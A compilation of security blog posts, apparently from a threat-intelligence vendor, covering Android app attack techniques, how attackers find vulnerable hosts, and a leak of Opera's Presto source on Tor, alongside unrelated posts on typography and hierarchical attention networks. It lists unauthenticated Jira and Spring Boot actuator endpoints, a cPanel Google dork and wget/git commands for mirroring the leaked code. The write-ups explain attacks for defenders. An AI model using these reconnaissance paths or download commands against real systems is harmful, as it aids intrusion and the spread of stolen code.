Why attackers can't resist Android apps

Why attackers can’t resist Android applications

In their quest for new attack surfaces, threat actors find easy targets among the ~2.7 million Android applications, ad infinitum.

What makes Android applications irresistible targets? 

  1. The ease with which an attacker can acquire the entire source code of an Android application.
  2. The source codes often contain API keys, secret tokens, sensitive credentials, and endpoints, which developers forget to remove after staging.

Developers often lack awareness about attack vectors on a mobile app. Owing to a false sense of security, provided by the sandboxed and permission-oriented operating systems. However, mobile apps have the same attack vectors as web apps, albeit with different exploitation techniques. 

When an attacker meets an Android app

After getting their hands on an Android app’s source code, attackers first decompile it, analyse it for weaknesses, and then exploit it.

Decompiling the source code

The attacker first extracts files and folders from the apk file of an Android app, which is similar to unzipping a zip file. However, the files are compiled. To read the source code, the files are decompiled using:     

  • Apktool: To read the AndroidManifest.xml file. It also disassembles to small code and allows to repack the apk after modifications.
  • Dex2jar: To convert the Dex file into a Jar file.
  • Jadx/Jd-gui: To read the code in GUI format.

Analysing the source code

The attacker analyses the source code using 2 methods: 

  • Static Analysis
  • Dynamic Analysis

Static Analysis

In this approach, the attacker examines the source code for secret tokens, API keys, credentials, and secret paths. They also understand the source code, check for activities, content providers, broadcast receivers, vulnerable permissions, local storage, sensitive files, etc.

Here are some examples of what attackers look for during static analysis:

Sensitive Information 

As we can see, the strings.xml file below exposes sensitive information such as API keys, bucket name, Firebase database URL, etc.

strings.xml file exposes sensitive information about the Android app
strings.xml file exposes sensitive information
Working Credentials

Often, usernames and passwords are hidden in the source code, because developers forget to remove them. 

Exposed passwords make the Android app vulnerable
Exposed passwords
Content Providers

Content Providers allow applications to access data from other applications. And in order to access a Content Provider, you need its URI. 

Attackers check if the Content Provider attribute is ‘exported=true,’ which implies that it can be accessed by third-party applications.

The Content Provider attribute is ‘exported=true'
The Content Provider attribute is ‘exported=true’
Content Provider URI
Content Provider URI

Below we are accessing the content provider declared by the vulnerable application through the tool i.e. content, which acts as a third-party application.

Using the Content Provider to access data without a PIN
Using the Content Provider to access data without a PIN
Activities

An activity implements a screen/window in an app. So, an app usually invokes only an activity i.e. a particular screen in another app, and not the app as a whole.  

Attackers check for weaknesses in activities in the AndroindManifest.xml file. Where, if an activity is marked as ‘exported=true,’ a third-party app can initiate that activity.

Activity marked as 'exported=true'
Activity marked as ‘exported=true’

For example, the screen below has a functionality to submit a password. And only on submitting the password, we can see the dashboard. 

Password required to view dashboard
Password required to view dashboard

However, if the activity responsible for showing the dashboard is marked ‘exported= true,’ an attacker can use an Activity Manager (AM) tool to run it. 

Using an Activity Manager to run the activity
Using an Activity Manager to run the activity

And by doing this the attacker can access the dashboard without a password. 

Accessing the dashboard without a password
Accessing the dashboard without a password
Broadcast Receivers

Broadcast receivers listen for system-generated or custom generated events from other applications or from the system itself. 

Attackers check for weaknesses in Broadcast Receivers in the AndroindManifest.xml file. And if the intent-filter tag is declared ‘exported=true,’ a third-party application can easily access it. To prevent this, we need to explicitly declare ‘exported=false.’

Intent-filter tag declared ‘exported=true’
Intent-filter tag declared ‘exported=true’

After checking for the parameters that the receiver can accept, attackers can write a command that will trigger the receiver on behalf of the application.  

For example: The following command triggers the receiver to send a message to a phone number. 

Command to trigger the receiver
Command to trigger the receiver

Following which, the message is delivered to the phone number:

Message sent as per command
Message sent as per command

Dynamic analysis

In this approach, the attacker uses a binary toolkit such a Frida to hook to a targeted application and change its implementation. It also allows the attacker to bypass root detection and SSLs. 

Since Frida has the capability to access classes and functions of a targeted process/ application, the attacker injects their own JavaScript (JS) payload at runtime, to analyze the behavior of the code. 

Bypassing root detection

The following application has root detection. Hence, to access all the capabilities of the application, the attackers need to bypass root detection. 

A device that has root detection
A device that has root detection

First, the attacker needs to identify the function that is responsible for root detection. Which they can get from the source code:

Root detection function in the source code
Root detection function in the source code

If one of the functions i.e. ‘doesSuperuserApkExist(‘’) and doesSuExist(‘’)’ returns True, it will be identified as a Rooted Device.

So, the attacker needs to change the implementation of these two functions to False, in order to bypass the rooting. And this is where Frida comes to use. 

By injecting the following JS payload, the attacker changes the implementation of the functions responsible for root detection. 

JS payload to change the root detection function
JS payload to change the root detection function

With the help of use(), the attacker accesses the PostLogin class. Here, they mention the function i.e. ‘doesSUexist or doesSuperuserApkExist,’ that they need to hook. After which, the function will start returning False instead of True

Frida Client then sends the server this JS payload. And the server makes it a thread and sends it to the JS Engine. So, whenever the application calls this function, Frida will call the thread instead of the actual function declared in source code.

"<yoastmark

Conclusion

Given the increasing sophistication of cyber-attacks, it is important that Android apps undergo proper vulnerability assessments before publishing. Also, developers should not leave sensitive information such as API keys and credentials exposed in the source code. 

How do threat actors discover and exploit vulnerabilities in the wild?

 

In the recent past, several security vulnerabilities have been discovered, in widely used software products. Since these products are installed on a significant number of devices, connected to the internet, it entices threat actors to develop botnets, steal sensitive data, and more.

In this article we explore:

  • Vulnerabilities detected in some popular products.
  • Target identification and exploitation techniques employed by intrusive threat actors.
  • Threat actors’ course of action in the event of identifying a flaw in widely used internet products/technology.

 

Popular Target Vulnerabilities and their Exploitation

 Ghostcat: Apache Tomcat Vulnerability

All Apache Tomcat Server versions are vulnerable to Local File Inclusion and Potential RCE. The issue resides in the AJP protocol, which is an optimised version of the HTTP protocol. The years old vulnerability is vulnerable because of the component which handled a request attribute improperly. The AJP protocol, enabled by default, listens on TCP port 8009. Multiple scanners, exploit scripts, honeypots surfaced in a matter of days after the original disclosure by Apache.

Stats published by researchers indicate a large number of affected systems, the numbers being much greater than originally predicted.

Twitter post on the number of hosts that have vulnerabilities
Twitter post on the number of affected hosts

Citrix ADC, Citrix Gateway RCE, Directory Traversal

Recently, Directory Traversal and RCE vulnerabilities, in Citrix ADC and Gateway products, affected at least 80,000 systems. Shortly after the disclosure, multiple entities (ProjectZeroIndia, TrustedSec) released PoC scripts publicly that engendered a slew of exploit attempts, from multiple actors in the wild.

Stats on honeypot detects per hour on expose vulnerabilities
Stats on honeypot detects: https://twitter.com/sans_isc/status/1216022602436808704

Jira Sensitive Data Exposure

 A few months ago, researchers found Jira Instances leaking sensitive information such as names, roles, email IDs of employees. Additionally, internal project details, such as milestones, current projects, owner and subscriber details, etc., were also accessible to anyone making a request to the following unauthenticated JIRA endpoints:

 

https://jirahost/secure/popups/UserPickerBrowser.jspa

https://jirahost/secure/ManageFilters.jspa?filterView=popular

https://jirahost/secure/ConfigurePortalPages!default.jspa?view=popular

Companies affected due to Jira vulnerabilities
Companies affected due to the Jira vulnerability

Avinash Jain, from Grofers, tested the vulnerability on multiple targets, and discovered a large number of vulnerable Jira instances, revealing sensitive data belonging to various companies, such as NASA, Google and Yahoo, and its employees.

 Spring Boot Data Leakage via Actuators

Spring Boot is an open source Java-based MVC framework. It enables developers to quickly set up routes to serve data over HTTP. Most apps using the Spring MVC framework now also use the Boot utility. Boot helps developers to configure what components to add, and also to setup the Framework faster.

An added feature of the tool called Actuator, enables developers to monitor and manage their applications/REST API, by storing and serving request dumps, metrics, audit details, and environment settings.

In the event of a misconfiguration, these Actuators could be a back door to the servers, making exposed applications susceptible to breaches. The misconfiguration in Spring Boot Versions 1 to 1.4 granted access to Actuator endpoints without authentication. Although later versions secure these endpoints by default, and allow access only after authentication, developers still tend to ignore the misconfiguration before deploying the application.

The following actuator endpoints leak sensitive data:

/dump performs a thread dump and returns the dump
/trace returns the dump of HTTP requests received by the app
/logfile returns the app-logged content
/shutdown commands the app to shutdown gracefully
/mappings returns a list of all the @RequestMapping paths
/env exposes all the Spring’s ConfigurableEnvironment values
/health returns application’s health information

 

There are other such defective Actuator endpoints, that provide sensitive information to:

  • Gain system information
  • Send requests as authenticated users (by leveraging session values obtained from the request dumps)
  • Execute critical commands, etc.

Webmin RCE via backdoored functionality

Webmin is a popular web-based system configuration tool. A zero-day pre-auth RCE vulnerability, affects some of its versions, between 1.882 and 1.921. This vulnerability enables the remote password change functionality. The Webmin code repository on SourceForge was backdoored with malicious code allowing remote command execution (RCE) capability on an affected endpoint.

The attacker sends his commands piped with Password Change parameters through `password_change.cgi` on the vulnerable host running Webmin. And if the Webmin app is hosted with root privileges, the adversary can execute malicious commands as an administrator.

Command execution payload
Command execution payload

Why do threat actors exploit vulnerabilities?

  1. Breach user/company data: Data exfiltration of Sensitive/PII data
  2. Computing power: Infecting systems to mine Cryptocurrency, serve malicious files
  3. Botnets, serving malicious files: Exploits targeted at adding more bots to a larger botnet
  4. Service disruption and eventually Ransom: Locking users out of the devices
  5. Political reasons, cyber war, angry user, etc.

 

How do adversaries exploit vulnerabilities?

On disclosure of such vulnerabilities, adversaries probe the internet for technical details and exploit codes, to launch attacks. Rand corporation’s research and analysis on zero-day vulnerabilities states that, after a vulnerability disclosure, it takes 6 to 37  days and a median of 22 days to develop a fully functional exploit. But when an exploit disclosure comes with a patch, developers and administrators immediately patch the vulnerable software. Auto update, regular security updates, large scale coverage of such disclosures help to contain attacks. However, several systems run the unpatched versions of a software or application and become easy targets for such attacks.

Steps involved in vulnerability exploitation

Once a bad actor decides to exploit a vulnerability they have to:

  • Obtain a working exploit or develop an exploit (in case of a zero-day vulnerability)
  • Utilize Proof of Concept (PoC) attached to a bug report (in case of a bug disclosure)
  • Identify as many hosts as possible that are vulnerable to the exploit
  • Maximise the number of targets to maximise profits.

Target Hunting

Even though the respective vendors patch vulnerabilities reported, upon searching GitHub or specific CVEs on ExploitDB, we can find PoC scripts for the issues. Usually PoC scripts require a host/ URL as an input and it measures the success of the exploit/ examination.

Adversaries identify a vulnerable host through their signatures/ behaviour, to generate a list of exploitable hosts. The following components possess signatures that determine whether a host is vulnerable or not:

  • Port
  • Path
  • Subdomain
  • Indexed Content/ URL

Port

Many commonly used software has a specific default installation port(s). If a port is not configured, the software installs on a pre-set port. And in most cases a software installs on the default port. For example, most systems use default port 3306 to install MySQL and port 9200 for Elasticsearch. So, by curating a list of all servers with an open 9200 port, a threat actor can determine systems running the Elasticsearch. However, port 9200 can be used to install other services/ software as well.

Using port scans to discover targets to exploit the Webmin RCE vulnerabilities

  • Determining that the default port where Webmin listens to after installation is Port 10000.
  • Get a working PoC for the Webmin exploit.
  • Execute a port scan on all hosts connected to the internet for port 10000.
  • This will lead to a discovery of all possible Webmin installations that could be vulnerable to the exploit.

In addition, tools like Shodan make port-based target discovery effortless. At the same time, if Shodan does not index the target port, attackers leverage tools like MassScan, Zenmap and run an internet-wide scan. The latter approach hardly takes a day if the attacker has enough resources.

Similarly, an attacker in search of an easy way to find a list of systems affected by Ghostcat, will port scan all the target IPs and narrow down on machines with port 8009 open.

Path

Software/ services are commonly installed on a distinct default path. Thus, the software can be fingerprinted by observing the signature path. For instance, WordPress installations can be identified if the path ‘wp-login.php’ is detected on the server. This facilitates locating the service as it accesses a web browser.

For example, when phpmyadmin utility is installed, by default it installs on the path ‘/phpmyadmin’. A user can access the utility through this path. In this case, a port scan won’t help, because this utility doesn’t install on a specific port.

Using distinct paths to discover targets to exploit Spring Boot Data Leakage

  • Gather a list of hosts that run Spring Boot. Since the default Spring Boot applications start on port 8080, it would help to have a list of hosts that have this port open. This allows threat actors to see a pattern.
  • Hit specific endpoints like ‘/trace’, ‘/env’ on the hosts and check the response for sensitive content.

Web path scanners and web fuzzer tools such as Dirsearch or Ffuf facilitate this process.

Though responses may include false positives, actors can use techniques, such as signature matching or static rule check, to constrict the list of vulnerable hosts. As this method operates with HTTP requests and responses, the process can be much slower than mass scale port scans. Shodan can also fetch hosts based on http responses, from its index.

Subdomain

Software are commonly installed on a specific subdomain since is an easier, standard, and convenient way to operate the software.

For example, Jira is commonly found on a subdomain as in ‘jira.domain.com’ or ‘bug-jira.domain.com’. Even though there are no rules when it comes to subdomains, adversaries can identify certain patterns. Similar services, usually installed on a subdomain, are Gitlab, Ftp, Webmail, Redmine, Jenkins, etc.

Security Trails, Circl.lu, Rapid7 Open Data hold passive DNS records. Other scanners that maintain such records would be sites such as Crt.sh and Censys. They collect SSL certificate records regularly and have an add-on feature that supports queries.

Indexed Content/Url

The content published by services is generally unique. If we employ search engines such as Google, to find pages based on particular signatures, serving specific content, the results will have a list of URLs running a particular service. This is one of the most common techniques to hunt down targets, easily.
It is commonly known as ‘Google Dorking’. For instance, adversaries can quickly curate a short list of all cPanel login pages. For which, they could use the following Dork in Google Search: “site:cpanel.*.* intitle:”login” -site:forums.cpanel.net”. The Google Hacking database contains numerous such Dorks and after understanding the search mechanism, it is easy to write such search queries.

Observations

There have been multiple honey pot experiments to study the mass scale exploration and exploitation in the wild. Setting up honey pots is not only a good way of understanding the attack patterns, it also serves in identifying malicious actors out there, trying to exploit systems in the wild. These identified IPs/ Network trying to enumerate targets or exploit vulnerable systems end up in various public blacklists. Various research attempts have set up diverse honeypots and studied the techniques used to gain access. Most attempts are to gain access via default credentials, and originated mainly from blacklisted IP addresses.

Another interesting observation is that, most honeypot detected traffic, seems to originate from China. It is also very common to see honeypots specific to a zero-day surface on Github as soon after a the release of an exploit. The Citrix ADC vulnerability (CVE-2019-19781) also saw a few honeypots being published on Github within a short time after the first exploit PoC was released.

Research carried out by Sophos highlights the high rate of activity on exposed targets using honeypots. As reported in the research paper, it took from less than a minute to 2 hours for the first attack on the exposed target. Therefore, if an accidental misconfiguration leaves a system exposed to the internet, for even a short period of time, it should not be assumed that the system was not exploited.

Employing Typography to Improve Content Engagement

The purpose of content, regardless of the choice of font, size, colour, and design, is to communicate one’s thoughts. The aesthetic of the text is just as important, as the composition of sentences and paragraphs, in conveying ideas, to the reader, with clarity. So, it’s not just what, but also how, a writer presents their content, that determines its impact on the reader. Better typography produces better content. 

How does typography affect content?

  • Typography is crucial in invoking and sustaining a reader’s interest from the first line to the last. 
  • It can enhance the overall readability of the text. 
  • It makes the reading experience less effortful, thus allowing the reader to absorb the content with ease. 
  • 90% of the content we consume on the web, in books, posters, and emails, is text. So, typography is not a mere afterthought. It is a primary factor that determines the reach and impact of the content it presents. 

Definition of Typography

 

In essence, typography is:

Typography in shortWhere type refers to letters and other characters which are arranged to form textual content.

Matthew Carter's definition of TypographyHow to choose a Typeface?

Writers are often confronted with the task of choosing the appropriate font to deliver their content. 

Here are a few factors to consider when choosing a typeface:

 

  • Choosing a typeface with multiple weights to create textual contrast

 

Varying the text weights will add contrast to the content. Apart from beautifying the text, it also helps to distinguish key text fragments from the rest of the content. 

 

Typography: Adding weight to the text

  • Tailor the content to suit your audience

While creating content, the writer should have the intended audience in mind. The readers’ age, interests, and cultural backgrounds determine what they read.

For instance, children and adults prefer different types of fonts.  

To stimulate an interest in reading, young readers need well-shaped and legible letters, such as Sassoon Primary or Gill Sans. Similarly, commonly used font styles such as Roboto or Futura are more appealing to adults.

Typography: Sassoon font suited for children

How to add variety and flair to text content?

Contrasting helps to draw the focus of readers to certain words or phrases. It also establishes hierarchy within the content and creates seamless content flow, by building relationships. Thus making it easy to navigate the different sections of the content. 

Typography: Techniques of Contrasting

Techniques of contrasting

Variation in text is achieved by:

  • Adjusting the weight of text 
  • Underlining text
  • Styling text using italics
  • Changing size and color of the font
  • And many more 

Writers can define their own style of contrasting, as well.

Sample for contrasting and adding weights

Tips: To reflect hierarchy in the content, font size of the text can be adjusted by 1.5x to 2x. This together with a variation in the weight of the text, will help the writer create visible gradations within, and between, sections.

Typography: Adjusting the font and font size

How to make text more engrossing?

Creating a style guide for typography will help writers standardize type and enhance legibility across their content.

Keeping the right line height for the text content

The vertical space between lines is crucial to the visual impact of the content. Narrow line spacing makes the content look crammed and will prove tedious to the reader. While increasing line spacing improves readability drastically, it adds to the content real estate.

Line Spacing sample

Tips: For better legibility, the line height of the text should be between 1.2 to 1.5 times the size of the font.

Takeaway

Typography plays a significant role in the process of writing textual content. Good typography makes reading effortless, whereas poor typography is off putting. Since typography is as much an art as it is a technique, the scope for experimentation is unlimited.  Writers should play with different styles and patterns, before settling on the one that suits their content best. 

Hierarchical Attention Neural Networks: New Approaches for Text Classification

by Bofin Babu, Machine Learning Lead

Text classification is an important task in Natural Language Processing in which predefined categories are assigned to text documents. In this article, we will explore recent approaches for text classification that consider document structure as well as sentence-level attention.

In general, a text classification workflow is like this:

 

You collect a lot of labeled sample texts for each class (your dataset). Then you extract some features from these text samples. The text features from the previous step along with the labels are then fed into a machine learning algorithm. After the learning process, you’ll save your classifier model for future predictions.

One difference between classical machine learning and deep learning when it comes to classification is that in deep learning, feature extraction and classification is carried out together but in classical machine learning, they’re usually separate tasks.

 

Proper feature extraction is an important part of machine learning for document classification, perhaps more important than choosing the right classification algorithm. If you don’t pick good features, you can’t expect your model to work well. Before discussing further the feature extraction, let’s talk about some methods of representing text for feature extraction.

A text document is made of sentences which in turn made of words. Now the question is: how do we represent them in a way that features can be extracted efficiently?

Document representation can be based on two models:

  1. Standard Boolean models: These models use boolean logic and the set theory are used for information retrieval from the text. They are inefficient compared to the below vector space model due to many reasons and are not our focus.

  2. Vector space models: Almost all of the existing text representation methods are based on VSMs. Here, documents are represented as vectors.

Let’s look at two techniques by which vector space models can be implemented for feature extraction.

Bag of words (BoW) with TF-IDF

In Bag of words model, the text is represented as the bag of its words. The below example will make it clear.

Here are two sample text documents:

(i) Bofin likes to watch movies. Rahul likes movies too.

(ii) Bofin also likes to play tabla.

Based on the above two text documents, we can construct a list of words in the documents as follows.

[ “Bofin”, “likes”, “to”, “watch”, “movies”, “Rahul”, “too”, “also”, “play”, “tabla” ]

Now if you consider a simple Bag of words model with term frequency (the number of times a term appears in the text), feature lists for the above two examples will be,

(i) [1, 2, 1, 1, 2, 1, 1, 0, 0, 0]

(ii) [1, 1, 1, 0, 0, 0, 0, 1, 1, 1]

A simple term frequency like this to characterize the text is not always a good idea. For large text documents, we use something called term frequency – inverse document frequency (tf-idf)tf-idf is the product of two statistics, term frequency (tf) and inverse document frequency (idf). We’ve just seen from the above example what tf is, now let’s understand idf. In simple terms, idf is a measure of how much a word is common to all the documents. If a word occurs frequently inside a document, that word will have high term frequency, if it also occurs frequently in the majority of the documents, it will have a low inverse document frequency. Basically, idf helps us to filter out words like the, i, an that occur frequently but are not important for determining a document’s distinctiveness.

Word embeddings with word2vec

Word2vec is a popular technique to produce word embeddings. It is based on the idea that a word’s meaning can be perceived by its surrounding words (Like the proverb: “Tell me who your friends are and I’ll tell you who you are” ). It produces a vector space from a large corpus, with each unique word in the corpus being assigned a corresponding vector in the vector space. The heart of word2vec is a two-layer neural network which is trained to model linguistic context of words such that words that share common contexts in a document are in close proximity inside the vector space.

Word2vec uses two architectures for representation. You can (loosely) think of word2vec model creation as the process consisting of processing every word in a document in either of these methods.

  1. Continuous bag-of-words (CBOW): In this architecture, the model predicts the current word from its context (surrounding words within a specified window size)
  2. Skip-gram: In this architecture, the model uses the current word to predict the context.

Word2vec models trained on large text corpora (like the entire English Wikipedia) have shown to grasp some interesting relations among words as shown below.

An example of word2vec models trained on large corpora, capturing interesting relationships among words. Here, not only the countries and their capitals cluster in two groups, the distance in vector space between them are also similar. Image source: DL4J
An example of word2vec models trained on large corpora, capturing interesting relationships among words. Here, not only the countries and their capitals cluster in two groups, the distance in vector space between them are also similar. Image source: DL4J

Following these vector space models, approaches using deep learning made progress in text representations. They can be broadly categorized as either convolutional neural network based approaches or recurrent neural network (and its successors LSTM/GRU) based approaches.

Convolutional neural networks (ConvNets) are found impressive for computer vision applications, especially for image classification. Recent research that explores ConvNets for natural language processing tasks have shown promising results for text classification, like charCNN in which text is treated as a kind of raw signal at the character level, and applying temporal (one-dimensional) ConvNets to it.

Recurrent neural network and its derivatives might be perhaps the most celebrated neural architectures at the intersection of deep learning and natural language processing. RNNs can use their internal memory to process input sequences, making them a good architecture for several natural language processing tasks.

Although straight neural network based approaches to text classification have been quite effective, it’s observed that better representations can be obtained by including knowledge of document structure in the model architecture. This idea is conceived from common sense that,

  • Not all part of a document is equally relevant for answering a query from it.
  • Finding the relevant sections in a document involves modeling the interactions of the words, not just their presence in isolation.

We’ll explore one such approach where word and sentence level attention mechanisms are incorporated for better document classification.

APPLYING HIERARCHICAL ATTENTION TO TEXTS

Two basic insight from the traditional methods we discussed so far in contrast to hierarchical attention methods are:

  1. Words form sentences, sentences form documents. And essentially, documents have a hierarchical structure and a representation capturing this structure can be more effective.
  2. Different words and sentences in a document are informative to different extents.

To make this clear, let’s look at the example below:

In this restaurant review, the third sentence delivers strong meaning (positive sentiment) and words amazing and superb contributes the most in defining sentiment of the sentence.

Now let’s look at how hierarchical attention networks are designed for document classification. As I said earlier, these models include two levels of attention, one at the word level and one at the sentence level. This allows the model to pay less or more attention to individual words and sentences accordingly when constructing the representation of the document.

The hierarchical attention network (HAN) consists of several parts,

  1. a word sequence encoder
  2. a word-level attention layer
  3. a sentence encoder
  4. a sentence-level attention layer

Before exploring them one by one, let’s understand a bit about the GRU based sequence encoder, which’s the core of the word and the sentence encoder of this architecture.

Gated Recurrent Units or GRU is a variation of LSTMs (Long Short Term Memory networks) which is, in fact, a kind of Recurrent Neural Network. If you are not familiar with LSTMs, I suggest you read  this  wonderful article. 

Unlike LSTM, the GRU uses a gating mechanism to track the state of sequences without using separate memory cells. There are two types of gates, the reset gate, and the update gate. They together control how information is updated to the state.

Refer the above diagram for the notations used in the following content.

1. Word Encoder

A bidirectional GRU is used to get annotations of words by summarising information from both directions for words and thereby incorporating the contextual information.

 

Where xit is the word vector corresponding to the word wit. and We is the embedding matrix.

We obtain an annotation for a given word wit by concatenating the forward hidden state and backward hidden state,

 

2. Word Attention

Not all words contribute equally to a sentence’s meaning. Therefore we need an attention mechanism to extract such words that are important to the meaning of the sentence and aggregate the representation of those informative words to form a sentence vector.

 

At first, we feed the word annotation hit through a one-layer MLP to get uit (called the word-level context vector) as a hidden representation for hit. Then we get the importance vector (?) as shown in the above equation. The context vector is basically a high-level representation of how informative a word is in the given sentence and learned during the training process.

3. Sentence Encoder

Similar to the word encoder, here we use a bidirectional GRU to encode sentences.

 

The forward and the backward hidden states are calculations are carried out similar to the word encoder and the hidden state h is obtained by concatenating them as, 

 

Now the hidden state hi summarises the neighboring sentences around the sentence but still with the focus on i.

4. Sentence Attention

To reward sentences that are clues to correctly classify a document, we again use attention mechanism at the sentence level.

 

Similar to the word context vector, here also we introduce a sentence level context vector us.

Now the document vector v is a high-level representation of the document and can be used as features for document classification.

So we’ve seen how document structure and attention can be used as features for classification. In the benchmark studies, this method outperformed the existing popular methods with a decent margin on popular datasets such as Yelp Reviews, IMDB, and Yahoo Answers.

Let us know what you think of attention networks in the discussion section below and feel free to ask your queries.

Opera (Presto) Source Code Leaked on Dark Web

by Rakesh Krishnan

Leaking the source code of the proprietary tools is not a new scenario in the cyber threat arena. Recently, Windows 10 source code was leaked into “Beta Archives’ FTP”; (later removed) which is an active discussion forum on Windows Releases.

Sometimes, it may be an Insider Threat (Breach) or other times, it may be an Intrusion which ultimately classified into “Leaks”.

Few months ago, the source code of the proprietary tool named “Presto”- a browser layout engine used by Opera, was leaked in January 2017 into a code sharing site “GitHub” and later to “BitBucket”. Although Opera is recognized as an open source material in the outer world; the layout engine which they were using earlier was a proprietary product inside the Opera Community.

It was taken down immediately by the DMCA Takedown Request filed by Opera; the complete packages had been removed from multiple code sharing platforms like GitHub and BitBucket.

The netizens had expressed their notion against the takedown of Presto Engine; expressing their views to open source the product; voicing through social media platforms like Reddit and other online forums; but no response hit back.

 

BACK ON TOR

The whole repository of Presto Engine had come live in the TOR network sited as http://xxxxxxxx5q5s4urp.onion/.

This onion site also provided the ways to download the entire package (which is huge) using the following wget command:

wget -m http://xxxxxxxx5q5s4urp.onion/

In case, if any error occurs while mirroring/downloading the complete onion domain; the site had also facilitated it by subdividing each branch; hence making it into archives format: http://xxxxxxxx5q5s4urp.onion/browser.git/, so that clone command can be used effectively as:

git clone xxxxxxq5s4urp.onion/browser.git

During an investigation, it was found that the onion site had been created on 20th December, 2017 and is hosted on an unstable Nginx server. It was accessible at some time; which makes it unstable.

Hosting the leak in the deep web is a clever method to evade the take downs from DMCA or other legal entities, as the onion domains will not be tracked; and can’t break until it is attacked by any means like DDoS.

Presto was being used by Opera till 2013; switched to WebKit engine.

Although the source code had been in no use; still it can be referenced by anyone to analyze the methods in the Opera community; hence the future proprietary apps from Opera could be using the same strategy for the development.

CloudSEK is a Unified Risk Management Platform. Our AI/ML technology based products XVigil and CloudMon monitor threats originating from the Web, DarkWeb, Deep Web,  Web applications etc.. and provide real time alerts.